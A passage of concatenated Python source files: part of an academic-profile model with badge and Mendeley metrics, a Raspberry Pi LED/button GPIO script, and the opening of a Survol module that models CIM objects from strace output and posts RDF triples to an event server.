print u"used to have babel support on dois: {}".format(already_assigned_badge.dois)
badge.Badge.query.filter_by(id=already_assigned_badge.id).delete()
self.num_badges = len(self.badges_to_show_in_ui)
def set_badge_percentiles(self, limit_to_badges=[]):
badge_names = [my_badge.name for my_badge in self.badges]
refsets = Refset.query.filter(Refset.name.in_(badge_names)).all()
for my_badge in self.badges:
if limit_to_badges:
if my_badge.name not in limit_to_badges:
# isn't a badge we want to assign right now, so skip
continue
if my_badge.name in badge.all_badge_assigner_names():
# from http://stackoverflow.com/a/7125547/596939
matching_refset = next((ref for ref in refsets if ref.name==my_badge.name), None)
if matching_refset:
my_badge.set_percentile(matching_refset.cutoffs)
@property
def parsed_name(self):
return u"{} {}".format(self.given_names, self.family_name)
@property
def full_name(self):
return u"{} {}".format(self.given_names, self.family_name)
@property
def num_twitter_followers(self):
try:
return self.twitter_creds["followers_count"]
except TypeError:
return None
@property
def display_coauthors(self):
if not self.coauthors:
return None
else:
ret = []
for coauthor in self.coauthors.values():
coauthor["sort_score"] = coauthor.get("num_posts", 0)
ret.append(coauthor)
return ret
# convenience method
def all_products_set_biblio_from_orcid(self):
for p in self.all_products:
p.set_biblio_from_orcid()
@property
def sorted_products(self):
return sorted([p for p in self.products],
key=lambda k: k.altmetric_score,
reverse=True)
@property
def products_with_dois(self):
ret = [p for p in self.all_products if p.doi]
return ret
@property
def products_no_dois(self):
ret = [p for p in self.all_products if not p.doi]
return ret
@property
def products_with_mentions(self):
ret = [p for p in self.all_products if p.has_mentions]
return ret
@property
def all_products(self):
ret = self.sorted_products
return ret
@property
def mendeley_readers(self):
total = 0
for p in self.all_products:
if p.mendeley_api_raw and "reader_count" in p.mendeley_api_raw:
total += p.mendeley_api_raw["reader_count"]
return total
@property
def mendeley_percent_of_products(self):
if not self.all_products:
return None
count = 0
for p in self.all_products:
if p.mendeley_api_raw and "reader_count" in p.mendeley_api_raw:
if p.mendeley_api_raw["reader_count"] >= 1:
count += 1
return float(count) / len(self.all_products)
@property
def mendeley_countries(self):
resp = {}
for p in self.all_products:
try:
resp = update_recursive_sum(resp, p.mendeley_api_raw["reader_count_by_country"])
except (AttributeError, TypeError):
pass
return resp
@property
def mendeley_disciplines(self):
resp = {}
for p in self.all_products:
try:
resp = update_recursive_sum(resp, p.mendeley_disciplines)
except (AttributeError, TypeError):
pass
return resp
@property
def mendeley_job_titles(self):
resp = {}
for p in self.all_products:
try:
resp = update_recursive_sum(resp, p.mendeley_job_titles)
except (AttributeError, TypeError):
pass
return resp
@property
def _mendeley_h_index(self):
reader_counts = []
for p in self.all_products:
try:
reader_counts.append(p.mendeley_api_raw["reader_count"])
except (KeyError, TypeError):
reader_counts.append(0)
t_index = h_index(reader_counts)
return t_index
def __repr__(self):
return u'<Person ({id}, @{twitter}, {orcid_id}) "{given_names} {family_name}" >'.format(
id=self.id,
twitter=self.twitter,
orcid_id=self.orcid_id,
given_names=self.given_names,
family_name=self.family_name
)
def to_dict(self):
ret = {
"_id": self.id, # do this too, so it is on top
"_full_name": self.full_name,
"id": self.id,
"orcid_id": self.orcid_id,
"email": self.email,
"first_name": self.first_name,
"given_names": self.given_names,
"family_name": self.family_name,
"created": date_as_iso_utc(self.created),
"updated": date_as_iso_utc(self.updated),
"claimed_at": date_as_iso_utc(self.claimed_at),
"picture": self.picture,
"affiliation_name": self.affiliation_name,
"affiliation_role_title": self.affiliation_role_title,
"twitter": self.twitter,
"depsy_id": self.depsy_id,
"campaign": self.campaign,
"percent_fulltext": self.percent_fulltext,
"percent_open_license": self.percent_open_license,
"fresh_orcid": self.fresh_orcid,
"num_posts": self.num_posts,
"num_mentions": self.num_mentions,
"num_orcid_products": len(self.all_products),
"mendeley": {
"country_percent": as_proportion(self.mendeley_countries),
"subdiscipline_percent": as_proportion(self.mendeley_disciplines),
"job_title_percent": as_proportion(self.mendeley_job_titles),
"mendeley_url": None,
"readers": self.mendeley_readers,
"percent_of_products": self.mendeley_percent_of_products
},
"sources": [s.to_dict() for s in self.sources],
"overview_badges": [b.to_dict() for b in self.overview_badges],
"badges": [b.to_dict() for b in self.badges_for_api],
"coauthors": self.display_coauthors,
"subscores": self.subscores,
"products": [p.to_dict() for p in self.all_products],
"num_twitter_followers": self.num_twitter_followers,
"promos": self.promos
}
# for testing! no products for jason.
# if self.orcid_id == "0000-0001-6187-6610":
# ret["products"] = []
return ret
def h_index(citations):
# from http://www.rainatian.com/2015/09/05/leetcode-python-h-index/
citations.sort(reverse=True)
i=0
while (i<len(citations) and i+1 <= citations[i]):
i += 1
return i
|
DKJ.py
|
import RPi.GPIO as GPIO
from time import sleep
from threading import Thread
import multiprocessing as mp
import ds18b20_temp_sensor
led1 = 3
led2 = 18
button= 11
counter = 0
Led = True
def setup():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(led1, GPIO.OUT)
GPIO.setup(led2, GPIO.OUT)
GPIO.setup(button, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)
def control_LED1():
global counter
global Led
Led = not Led
if Led:
GPIO.output(led1, GPIO.HIGH)
counter+=1
#print('Counter: {}'.format(counter))
else:
GPIO.output(led1, GPIO.LOW)
#
# def control_LED2():
# while True:
# GPIO.output(led2, GPIO.HIGH)
# sleep(2)
# GPIO.output(led2,GPIO.LOW)
# sleep(2)
def detect_button():
GPIO.remove_event_detect(button)
GPIO.add_event_detect(button, GPIO.RISING, callback=lambda x:control_LED1(),bouncetime=200)
def printing():
while True:
sleep(2)
print('This is using multi-threading')
if __name__ == '__main__':
setup()
#GPIO.add_event_detect(button, GPIO.RISING, callback=lambda x:control_LED2(),bouncetime=200)
p1 = Thread(target = control_LED2)
p2 = Thread(target = detect_button)
p3 = Thread(target = printing)
p1.start()
p2.start()
p3.start()
p1.join()
p2.join()
p3.join()
GPIO.cleanup()
quit()
|
cim_objects_definitions.py
|
# This contains the definitions of CIM objects and their containers.
# These containers are filled when functiosn calls detect the creation
# or handling of such an object.
# This modules contaisn specilized containers for thsee objects,
# which are later used to create a Dockerfile.
import os
import re
import six
import sys
import json
import platform
import datetime
import socket
import shutil
import threading
import time
import collections
import logging
try:
# This is for Python 2
import urllib2
import urllib
urlencode_portable = urllib.urlencode
except ImportError:
import urllib.request as urllib2
import urllib.parse
urlencode_portable = urllib.parse.urlencode
try:
# This is optional when used from dockit, so dockit can be used
# without any installation.
import psutil
except ImportError:
psutil = None
is_py3 = sys.version_info >= (3,)
is_platform_linux = sys.platform.startswith("linux")
################################################################################
def DecodeOctalEscapeSequence(aBuffer):
# An octal escape sequence consists of \ followed by one, two, or three octal digits.
# The octal escape sequence ends when it either contains three octal digits already,
# or the next character is not an octal digit.
# For example, \11 is a single octal escape sequence denoting a byte with numerical value 9 (11 in octal),
# rather than the escape sequence \1 followed by the digit 1.
# However, \1111 is the octal escape sequence \111 followed by the digit 1.
# In order to denote the byte with numerical value 1, followed by the digit 1,
# one could use "\1""1", since C automatically concatenates adjacent string literals.
# Note that some three-digit octal escape sequences may be too large to fit in a single byte;
# this results in an implementation-defined value for the byte actually produced.
# The escape sequence \0 is a commonly used octal escape sequence,
# which denotes the null character, with value zero.
# https://en.wikipedia.org/wiki/Escape_sequences_in_C
# https://stackoverflow.com/questions/4020539/process-escape-sequences-in-a-string-in-python
if is_py3:
decBuf = bytes(aBuffer, "utf-8").decode("unicode_escape")
else:
decBuf = aBuffer.decode('string_escape')
return decBuf
################################################################################
# Buffers transferred with read() and write() are parsed to detect information
# about the running applications. There can be several types of parsers,
# indexed by a descriptive key: "SqlQuery" etc...
# TODO: There is not valid reason to load all buffer scanners in this file.
BufferScanners = {}
try:
sys.path.append("../..")
# This creates the SQL queries scanner, it needs Survol code.
from survol import lib_sql
dictRegexSQL = lib_sql.SqlRegularExpressions()
dictRegexSQLCompiled = {
rgxKey : re.compile(dictRegexSQL[rgxKey], re.IGNORECASE)
for rgxKey in dictRegexSQL
}
# This returns a list of SQL queries.
def RawBufferSqlQueryScanner(aBuffer):
# The regular expressions are indexed with a key such as "INSERT", "SELECT" etc...
# which gives a hint about what the query does.
# This creates a dictionary mapping the RDF property to the compiled regular expression.
# Also, the regular expressions are compiled for better performance.
lstQueries = []
for rgxKey in dictRegexSQLCompiled:
compiledRgx = dictRegexSQLCompiled[rgxKey]
matchedSqls = compiledRgx.findall(aBuffer)
if matchedSqls:
lstQueries += matchedSqls
# TODO: For the moment, we just print the query. How can it be related to a database ?
# How can we get the database connection ?
# If attaching to a running process, this is even impossible.
# TODO: We can create symbolic database connection: At least we known the server name.
# We can associate one connection to each socket or pipe where a SQL query could be found.
# ... possibly list the connections as CIM objects.
# An extra regular expression on the buffer, or some test on the SQL query,
# might imply the database type. This is not very important because the database connection
# is an obvious information
# for the user.
return lstQueries
BufferScanners["SqlQuery"] = RawBufferSqlQueryScanner
except ImportError:
print("Cannot import optional module lib_sql")
pass
################################################################################
# When strace or ltrace display a call to read() and write(), they also display
# a fragment of the transferred bytes. It is needed to try to rebuild the entire
# sequence between the opening and the closing, because some important information
# that we want to parse, might be truncated.
# Beware, there are severe limitations: The amount of displayed bytes is limited,
# and it does not take into account fseek().
class BufferConcatenator:
def __init__(self):
self.m_currentBuffer = None
self.m_parsedData = None
def __analyse_io_buffer(self,aBuffer):
for scannerKey in BufferScanners:
scannerFunction = BufferScanners[scannerKey]
# This returns a list of strings.
# TODO: In a second stage, this will return CIM objects.
lstResults = scannerFunction(aBuffer)
if lstResults:
if self.m_parsedData == None:
self.m_parsedData = {}
if scannerKey in self.m_parsedData:
self.m_parsedData[scannerKey] += lstResults
else:
self.m_parsedData[scannerKey] = lstResults
def has_parsed_data(self):
return self.m_parsedData != None
def parsed_data_to_XML(self, strm, margin, direction):
if self.m_parsedData:
submargin = margin + " "
for scannerKey in self.m_parsedData:
# TODO: Have a specific tag for the list.
scannerKeySet = scannerKey + "_List"
strm.write("%s<%s direction='%s'>\n" % ( margin, scannerKeySet, direction ) )
scannerVal = self.m_parsedData[scannerKey]
for scanResult in scannerVal:
strm.write("%s<%s>%s</%s>\n" % ( submargin, scannerKey, scanResult, scannerKey ) )
strm.write("%s</%s>\n" % ( margin, scannerKeySet ) )
# This receives all read() and write() buffers displayed by strace or ltrace,
# decodes them and tries to rebuild a complete logical message if it seems
# to be truncated.
# It then analyses the logical pieces.
def append_io_buffer(self, aFragment, szFragment = 0):
decodedFragment = DecodeOctalEscapeSequence(aFragment)
# Typical buffer size are multiple of 100x:
# 256 100 #
# 512 200 #
# 12288 3000 #
# 49152 c000 #
# 65536 10000 #
# 262144 40000 #
isSegment = \
( ( szFragment % 0x100 == 0 ) and ( szFragment <= 0x1000) ) \
or ( ( szFragment % 0x1000 == 0 ) and ( szFragment <= 0x10000) ) \
or ( ( szFragment % 0x10000 == 0 ) and ( szFragment <= 0x100000) ) \
or ( ( szFragment % 0x100000 == 0 ) )
if isSegment and (szFragment == len(decodedFragment)):
if self.m_currentBuffer:
self.m_currentBuffer += decodedFragment
else:
self.m_currentBuffer = decodedFragment
else:
if self.m_currentBuffer:
self.__analyse_io_buffer(self.m_currentBuffer)
# Reuse memory.
del self.m_currentBuffer
self.m_currentBuffer = None
self.__analyse_io_buffer(decodedFragment)
################################################################################
G_FilesToPackagesCache = None
G_SameMachine = None
# This is a dictionary (indexed by processes) of dictionaries (indexed by files).
# It containes files accesses, which are object representing what happens
# to a file between its opening and closing by a process.
G_cacheFileAccesses = {}
# This models an open/read-or-write/close access from a process to a file.
# The same process may access several times the same file,
# producing several FileAccess objects.
# This is displayed in XML as a single tag:
# <FileAccess OpenTime="" CloseTime="" etc... />
class FileAccess:
def __init__(self,objProcess,objDataFile):
self.OpenTime = None
self.CloseTime = None
self.m_objectCIM_Process = objProcess
self.m_objectCIM_DataFile = objDataFile
objProcess.m_ProcessFileAccesses.append(self)
objDataFile.m_DataFileFileAccesses.append(self)
def SetOpenTime(self, timeStamp):
global G_cacheFileAccesses
try:
self.NumOpen += 1
except AttributeError:
self.NumOpen = 1
if not self.OpenTime or (timeStamp < self.OpenTime):
self.OpenTime = timeStamp
if G_SameMachine:
try:
filStat = os.stat( self.m_objectCIM_DataFile.Name )
self.OpenSize = filStat.st_size
except:
pass
# Strictly speaking, from now on, this is accessible from the cache.
G_cacheFileAccesses[self.m_objectCIM_Process][self.m_objectCIM_DataFile] = self
def SetCloseTime(self, timeStamp):
global G_cacheFileAccesses
# Maybe the file was never closed.
if not getattr(self,"CloseTime",0) or (timeStamp < self.CloseTime):
self.CloseTime = timeStamp
if G_SameMachine:
try:
filStat = os.stat( self.m_objectCIM_DataFile.Name )
self.CloseSize = filStat.st_size
except:
pass
# Then remove the object from the cache so it cannot be returned
# anymore from this process and this file because it is closed.
del G_cacheFileAccesses[self.m_objectCIM_Process][self.m_objectCIM_DataFile]
def _analyze_new_buffer(self, isRead, buffer_size, aBuffer):
if not aBuffer:
return
# This does not apply to files.
if self.m_objectCIM_DataFile.is_plain_file():
return
if isRead:
try:
self.m_bufConcatRead
except AttributeError:
self.m_bufConcatRead = BufferConcatenator()
concatBuf = self.m_bufConcatRead
else:
try:
self.m_bufConcatWrite
except AttributeError:
self.m_bufConcatWrite = BufferConcatenator()
concatBuf = self.m_bufConcatWrite
try:
concatBuf.append_io_buffer(aBuffer, buffer_size)
except Exception as exc:
# Example: '[pid 5602] 19:59:20.590740 <... read resumed> "... end of read() content"..., 32768) = 4096 <0.037642>'
sys.stdout.write("Cannot parse:%s szBuffer=%s: %s\n" % (aBuffer, buffer_size, exc))
exit(1)
def set_read_bytes_number(self, read_bytes_number, bufferRead):
try:
self.NumReads += 1
except AttributeError:
self.NumReads = 1
try:
self.BytesRead += read_bytes_number
except AttributeError:
self.BytesRead = read_bytes_number
self._analyze_new_buffer(True, read_bytes_number, bufferRead)
def set_written_bytes_number(self, written_bytes_number, bufferWrite):
try:
self.NumWrites += 1
except AttributeError:
self.NumWrites = 1
try:
self.BytesWritten += written_bytes_number
except AttributeError:
self.BytesWritten = written_bytes_number
self._analyze_new_buffer(False, written_bytes_number, bufferWrite)
def TagXML(self,strm,margin,displayedFromProcess):
strm.write("%s<Access" % ( margin ) )
if displayedFromProcess:
if self.m_objectCIM_Process:
strm.write(" Process='%s'" % ( self.m_objectCIM_Process.Handle ) )
else:
if self.m_objectCIM_DataFile:
strm.write(" File='%s'" % ( self.m_objectCIM_DataFile.Name ) )
if self.OpenTime:
strm.write(" OpenTime='%s'" % _timestamp_to_str( self.OpenTime ) )
if getattr(self,'OpenSize',0):
strm.write(" OpenSize='%s'" % ( self.OpenSize ) )
if self.CloseTime:
strm.write(" CloseTime='%s'" % _timestamp_to_str( self.CloseTime ) )
if getattr(self,'CloseSize',0):
strm.write(" CloseSize='%s'" % ( self.CloseSize ) )
if getattr(self,'NumReads',0):
strm.write(" NumReads='%s'" % ( self.NumReads ) )
if getattr(self,'BytesRead',0):
strm.write(" BytesRead='%s'" % ( self.BytesRead ) )
if getattr(self,'NumWrites',0):
strm.write(" NumWrites='%s'" % ( self.NumWrites ) )
if getattr(self,'BytesWritten',0):
strm.write(" BytesWritten='%s'" % ( self.BytesWritten ) )
accRead = getattr(self,'m_bufConcatRead',None)
accWrite = getattr(self,'m_bufConcatWrite',None)
if (accRead and accRead.has_parsed_data()) or (accWrite and accWrite.has_parsed_data()):
strm.write(" >\n" )
submargin = margin + " "
if accRead and accRead.has_parsed_data():
accRead.parsed_data_to_XML(strm, submargin, "Read")
if accWrite and accWrite.has_parsed_data():
accWrite.parsed_data_to_XML(strm, submargin, "Write")
strm.write("%s</Access>\n" % ( margin ) )
else:
strm.write(" />\n" )
@staticmethod
def lookup_file_access(objProcess,objDataFile):
global G_cacheFileAccesses
assert G_cacheFileAccesses is not None
try:
filAcc = G_cacheFileAccesses[objProcess][objDataFile]
except KeyError:
filAcc = FileAccess(objProcess,objDataFile)
try:
G_cacheFileAccesses[objProcess][objDataFile] = filAcc
except KeyError:
G_cacheFileAccesses[objProcess] = {objDataFile : filAcc}
return filAcc
@staticmethod
def serialize_list_to_XML(strm,vecFilesAccesses,margin,displayedFromProcess):
if not vecFilesAccesses:
return
subMargin = margin + " "
strm.write("%s<FileAccesses>\n" % ( margin ) )
for filAcc in vecFilesAccesses:
filAcc.TagXML(strm,subMargin,displayedFromProcess)
strm.write("%s</FileAccesses>\n" % ( margin ) )
################################################################################
# When replaying a session, it is not worth getting information about processes
# because they do not exist anymore.
G_ReplayMode = False
# The date where the test was run. Loaded from the ini file when replaying.
G_Today = None
def _timestamp_to_str(timStamp):
# 0 tm_year (for example, 1993)
# 1 tm_mon range [1, 12]
# 2 tm_mday range [1, 31]
# 3 tm_hour range [0, 23]
# 4 tm_min range [0, 59]
# 5 tm_sec range [0, 61]; see (2) in strftime() description
# 6 tm_wday range [0, 6], Monday is 0
# 7 tm_yday range [1, 366]
# 8 tm_isdst 0, 1 or -1; see below
# Today's date can change so we can reproduce a run.
if timStamp:
return G_Today + " " + timStamp
else:
return G_Today + " 00:00:00.000000"
################################################################################
# FIXME: Is it really needed ? And safe ??
#sys.path.append("../..")
# Import this now, and not in the destructor, to avoid the error:
# "sys.meta_path must be a list of import hooks"
# This module is needed for storing the generated data into a RDF file.
try:
if is_py3:
if ".." not in sys.path:
sys.path.append("..")
else:
if "../survol" not in sys.path:
sys.path.append("../survol")
from survol import lib_event
except ImportError:
lib_event = None
# This objects groups triples to send to the HTTP server, and periodically wakes up to send them.
# But if the server name is a file, the RDF content is instead stored to this file by the object destructor.
class HttpTriplesClient(object):
def __init__(self):
self._triples_list = []
# Threaded mode does not work when creating the server in the same process.
# For safety, this reverts to a simpler mode where the triples are sent
# in block at the end of the execution.
# TODO: Test this with thread mode.
self._is_threaded_client = False
# Tests if this a output RDF file, or rather None or the URL of a Survol agent.
self._server_is_file = G_UpdateServer and not(
G_UpdateServer.lower().startswith("http:")
or G_UpdateServer.lower().startswith("https:") )
if self._server_is_file:
print("G_UpdateServer=", G_UpdateServer, " IS FILE")
return
elif G_UpdateServer:
self._is_valid_http_client = True
if self._is_threaded_client:
self._shared_lock = threading.Lock()
self._client_thread = threading.Thread(target = self.run)
# If leaving too early, some data might be lost.
self._client_thread.daemon = True
self._client_thread.start()
def http_client_shutdown(self):
print("HttpTriplesClient.http_client_shutdown")
if self._server_is_file:
if not lib_event:
raise Exception("lib_event was not imported")
lib_event.json_triples_to_rdf(self._triples_list, G_UpdateServer)
print("Stored RDF content to", G_UpdateServer)
elif G_UpdateServer:
if self._is_threaded_client:
self._push_triples_to_server_threaded()
else:
# FIXME: The URL event_put.py sometimes times out, on Python 3 and only
# FIXME: ... if the server is started by the test program (pytest or unittest).
triples_as_bytes, sent_triples_number = self._pop_triples_to_bytes()
if triples_as_bytes:
received_triples_number = self._send_bytes_to_server(triples_as_bytes)
if received_triples_number != sent_triples_number:
raise Exception("Lost triples: %d != %d\n" % (received_triples_number, sent_triples_number))
def _pop_triples_to_bytes(self):
triples_number = len(self._triples_list)
if triples_number:
triples_as_bytes = json.dumps(self._triples_list)
if is_py3:
assert isinstance(triples_as_bytes, str)
triples_as_bytes = triples_as_bytes.encode('utf-8')
assert isinstance(triples_as_bytes, bytes)
else:
assert isinstance(triples_as_bytes, str)
self._triples_list = []
else:
triples_as_bytes = None
return triples_as_bytes, triples_number
def _send_bytes_to_server(self, triples_as_bytes):
assert isinstance(triples_as_bytes, six.binary_type)
assert not self._server_is_file
if not self._is_valid_http_client:
return -1
try:
req = urllib2.Request(G_UpdateServer)
print("len(triples_as_bytes)=%d\n" % len(triples_as_bytes))
urlopen_result = urllib2.urlopen(req, data=triples_as_bytes, timeout=30.0)
server_response = urlopen_result.read()
json_response = json.loads(server_response)
if json_response['success'] != 'true':
raise Exception("Event server error message=%s\n" % json_response['error_message'])
received_triples_number = int(json_response['triples_number'])
return received_triples_number
except Exception as server_exception:
sys.stdout.write("Event server error=%s\n" % str(server_exception))
self._is_valid_http_client = False
raise
def _push_triples_to_server_threaded(self):
assert not self._server_is_file
assert self._is_threaded_client
self._shared_lock.acquire()
triples_as_bytes, sent_triples_number = self._pop_triples_to_bytes()
# Immediately unlocked so no need to wait for the server.
self._shared_lock.release()
if triples_as_bytes:
received_triples_number = self._send_bytes_to_server(triples_as_bytes)
if received_triples_number != sent_triples_number:
raise Exception("Lost triples: %d != %d\n" % (received_triples_number, sent_triples_number))
# This thread functor loops on the container of triples.
# It formats them in JSON and sends them to the URL of the events server.
def run(self):
assert self._is_threaded_client
while True:
time.sleep(2.0)
self._push_triples_to_server_threaded()
def queue_triples_for_sending(self, json_triple):
if self._server_is_file:
#assert not self._is_threaded_client
# Just append the triple, no need to synchronise.
self._triples_list.append(json_triple)
elif G_UpdateServer:
if self._is_threaded_client:
self._shared_lock.acquire()
self._triples_list.append(json_triple)
self._shared_lock.release()
else:
self._triples_list.append(json_triple)
# This is the Survol server which is notified of all updates
# of CIM objects. These updates can then be displayed in Survol Web clients.
# It must be a plain Web server to be hosted by Apache or IIS.
G_UpdateServer = None
################################################################################
# attr=AccessTime attrVal=1518262584.92 <type 'float'>
def TimeT_to_DateTime(stTimeT):
# Or utcfromtimestamp
return datetime.datetime.strftime( datetime.datetime.fromtimestamp(stTimeT), "%H:%M:%S:%f")
################################################################################
# This returns only leaf classes.
def leaf_derived_classes(the_class):
current_subclasses = the_class.__subclasses__()
return set([sub_class for sub_class in current_subclasses if not leaf_derived_classes(sub_class)]).union(
[sub_sub_class for sub_class in current_subclasses for sub_sub_class in leaf_derived_classes(sub_class)])
# CIM classes are defined as plain Python classes plus their attributes.
# Therefore, CIM attributes are mixed with Python ones.
# This function is a rule-thumb test to check if an attribute of a class
# is a CIM attribute. It works because there are very few non-CIM attributes.
def IsCIM(attr, attr_val):
return not callable(attr_val) and not attr.startswith("__") and not attr.startswith("m_")
# This identifies CIM attribute which is date or time and must be displayed as such.
def _is_time_stamp(attr):
return attr.find("Date") > 0 or attr.find("Time") > 0
# This is the base class of all CIM_xxx classes. It does the serialization
# into XML and also sends updates events to the Survol server if there is one.
class CIM_XmlMarshaller(object):
def __init__(self):
pass
def PlainToXML(self,strm,subMargin):
try:
# Optional members order.
attrExtra = self.__class__.m_attributes_priorities
except AttributeError:
attrExtra = []
start = len(attrExtra)
enumAttrs = {}
for elt in dir(self):
enumAttrs[ elt ] = start
start += 1
start = 0
for elt in attrExtra:
enumAttrs[ elt ] = start
start += 1
dictAttrs = dict((val,key) for (key,val) in enumAttrs.items())
for idx in sorted(dictAttrs.keys()):
attr = dictAttrs[idx]
try:
attrVal = getattr(self,attr)
except AttributeError:
continue
if IsCIM(attr,attrVal):
# FIXME: Not very reliable.
if _is_time_stamp(attr):
attrVal = _timestamp_to_str(attrVal)
if attrVal:
# No need to write empty strings.
strm.write("%s<%s>%s</%s>\n" % ( subMargin, attr, attrVal, attr ) )
def HttpUpdateRequest(self,**objJson):
G_httpClient.queue_triples_for_sending(objJson)
def SendUpdateToServer(self, attrNam, oldAttrVal, attrVal):
# These are the properties which uniquely define the object.
# There are always sent even if they did not change,
# otherwise the object could not be identified.
theSubjMoniker = self.get_survol_moniker()
# TODO: If the attribute is part of the ontology, just inform about the object creation.
# TODO: Some attributes could be the moniker of another object.
# TODO: AND THEREFORE, SEND LINKS, NOT ONLY LITERALS !!!
# OTHERWISE NO EDGES !!
if oldAttrVal and isinstance( oldAttrVal, CIM_XmlMarshaller):
raise Exception("Not implemented yet")
objMonikerOld = oldAttrVal.get_survol_moniker()
attrNamDelete = attrNam + "?predicate_delete"
self.HttpUpdateRequest(subject=theSubjMoniker,predicate=attrNam,object=objMonikerOld )
# For example a file being opened by a process, or a process started by a user etc...
if isinstance( attrVal, CIM_XmlMarshaller):
objMoniker = attrVal.get_survol_moniker()
self.HttpUpdateRequest(subject=theSubjMoniker,predicate=attrNam,object=objMoniker)
else:
self.HttpUpdateRequest(subject=theSubjMoniker,predicate=attrNam,object=attrVal)
# Any object change is broadcast to a Survol server.
def __setattr__(self, attrNam, attrVal):
# First, change the value, because it might be needed to calculate the moniker.
try:
oldAttrVal = self.__dict__[attrNam]
except:
oldAttrVal = None
self.__dict__[attrNam] = attrVal
#https://stackoverflow.com/questions/8600161/executing-periodic-actions-in-python
if G_UpdateServer:
if oldAttrVal != attrVal:
if IsCIM(attrNam,attrVal):
self.SendUpdateToServer(attrNam, oldAttrVal, attrVal)
@classmethod
def DisplaySummary(cls, fd_summary_file, cimKeyValuePairs):
pass
@classmethod
def XMLSummary(cls, fd_summary_file, cimKeyValuePairs):
namClass = cls.__name__
margin = " "
subMargin = margin + margin
for objPath,objInstance in sorted(G_mapCacheObjects[namClass].items()):
fd_summary_file.write("%s<%s>\n" % (margin, namClass))
objInstance.PlainToXML(fd_summary_file, subMargin)
fd_summary_file.write("%s</%s>\n" % (margin, namClass))
@classmethod
def CreateMonikerKey(cls, *args):
# The input arguments must be in the same order as the ontology.
#sys.stdout.write("CreateMonikerKey %s %s %s\n"%(cls.__name__,str(cls.cim_ontology_list),str(args)))
mnk = cls.__name__ + "." + ",".join('%s="%s"' % (k, v) for k, v in zip(cls.cim_ontology_list, args))
#sys.stdout.write("CreateMonikerKey mnk=%s\n"%mnk)
return mnk
# This object has a class name, an ontology which is an ordered list
# of attributes names, and several attributes in the object itself.
# This method wraps the class name and these attributes and their values,
# into an object which is used to store an event related to this object.
# JSON escapes special characters in strings.
def get_survol_moniker(self):
attributes_dict = {attribute_key: getattr(self, attribute_key) for attribute_key in self.cim_ontology_list}
return (self.__class__.__name__, attributes_dict)
def __repr__(self):
mnk = self.__class__.__name__ + "." + ",".join( '%s="%s"' % (k,getattr(self,k)) for k in self.cim_ontology_list )
return "%s" % mnk
@staticmethod
def create_instance_from_class_name(cim_class_name, **cim_attributes_dict):
cim_class_definition = _class_name_to_subclass[cim_class_name]
attributes_list = [cim_attributes_dict[key] for key in cim_class_definition.cim_ontology_list]
return cim_class_definition(*attributes_list)
################################################################################
# Read from a real process or from the ini file when replaying a session.
G_CurrentDirectory = u""
# The CIM_xxx classes are taken from Common Information Model standard.
# They share some properties and are adding more.
# class CIM_ComputerSystem : CIM_System
# {
# string Caption;
# string Description;
# datetime InstallDate;
# string Status;
# string CreationClassName;
# string Name;
# string PrimaryOwnerContact;
# string PrimaryOwnerName;
# string Roles[];
# string NameFormat;
# }
class CIM_ComputerSystem(CIM_XmlMarshaller):
def __init__(self, hostname):
super(CIM_ComputerSystem, self).__init__()
self.Name = hostname.lower() # This is a convention.
if not G_ReplayMode and psutil:
vm = psutil.virtual_memory()
self.VirtualMemoryTotal = vm[0]
self.VirtualMemoryAvailable = vm[1]
self.VirtualMemoryUsed = vm[3]
self.VirtualMemoryFree = vm[4]
try:
cf = psutil.cpu_freq()
if cf:
self.CpuCurrent = cf[0]
self.CpuMinimum = cf[1]
self.CpuMaximum = cf[2]
except AttributeError:
pass
cim_ontology_list = ['Name']
#
# class CIM_OperatingSystem : CIM_LogicalElement
# {
# string Caption;
# string CreationClassName;
# string CSCreationClassName;
# string CSName;
# sint16 CurrentTimeZone;
# string Description;
# boolean Distributed;
# uint64 FreePhysicalMemory;
# uint64 FreeSpaceInPagingFiles;
# uint64 FreeVirtualMemory;
# datetime InstallDate;
# datetime LastBootUpTime;
# datetime LocalDateTime;
# uint32 MaxNumberOfProcesses;
# uint64 MaxProcessMemorySize;
# string Name;
# uint32 NumberOfLicensedUsers;
# uint32 NumberOfProcesses;
# uint32 NumberOfUsers;
# uint16 OSType;
# string OtherTypeDescription;
# uint64 SizeStoredInPagingFiles;
# string Status;
# uint64 TotalSwapSpaceSize;
# uint64 TotalVirtualMemorySize;
# uint64 TotalVisibleMemorySize;
# string Version;
# };
class CIM_OperatingSystem(CIM_XmlMarshaller):
def __init__(self):
super(CIM_OperatingSystem, self).__init__()
if not G_ReplayMode:
self.OSType = sys.platform
self.Name = os.name
self.System = platform.system()
self.Release = platform.release()
self.Platform = platform.platform()
cim_ontology_list = []
#
# class CIM_NetworkAdapter : CIM_LogicalDevice
# {
# boolean AutoSense;
# uint16 Availability;
# string Caption;
# uint32 ConfigManagerErrorCode;
# boolean ConfigManagerUserConfig;
# string CreationClassName;
# string Description;
# string DeviceID;
# boolean ErrorCleared;
# string ErrorDescription;
# datetime InstallDate;
# uint32 LastErrorCode;
# uint64 MaxSpeed;
# string Name;
# string NetworkAddresses[];
# string PermanentAddress;
# string PNPDeviceID;
# uint16 PowerManagementCapabilities[];
# boolean PowerManagementSupported;
# uint64 Speed;
# string Status;
# uint16 StatusInfo;
# string SystemCreationClassName;
# string SystemName;
# };
class CIM_NetworkAdapter(CIM_XmlMarshaller):
def __init__(self, address):
super(CIM_NetworkAdapter, self).__init__()
self.Name = address
self.PermanentAddress = address
cim_ontology_list = ['Name']
# class CIM_Process : CIM_LogicalElement
# {
# string Caption;
# string CreationClassName;
# datetime CreationDate;
# string CSCreationClassName;
# string CSName;
# string Description;
# uint16 ExecutionState;
# string Handle;
# datetime InstallDate;
# uint64 KernelModeTime;
# string Name;
# string OSCreationClassName;
# string OSName;
# uint32 Priority;
# string Status;
# datetime TerminationDate;
# uint64 UserModeTime;
# uint64 WorkingSetSize;
# };
class CIM_Process(CIM_XmlMarshaller):
def __init__(self, proc_id):
super(CIM_Process, self).__init__()
# sys.stdout.write("CIM_Process proc_id=%s\n"%proc_id)
# SOME MEMBERS MUST BE DISPLAYED AND FOLLOW CIM CONVENTION.
self.Handle = proc_id
self.m_parentProcess = None
self.m_subProcesses = set()
self.CreationDate = None
self.TerminationDate = None
# This contains all the files objects accessed by this process.
# It is used when creating a DockerFile.
# It is a set, so each file appears only once.
self.m_ProcessFileAccesses = []
# TODO: ADD AN ARRAY OF CIM_DataFile
# AND THE ATTRIBUTES COULD CONTAIN THE DATA OF m_ProcessFileAccesses ???
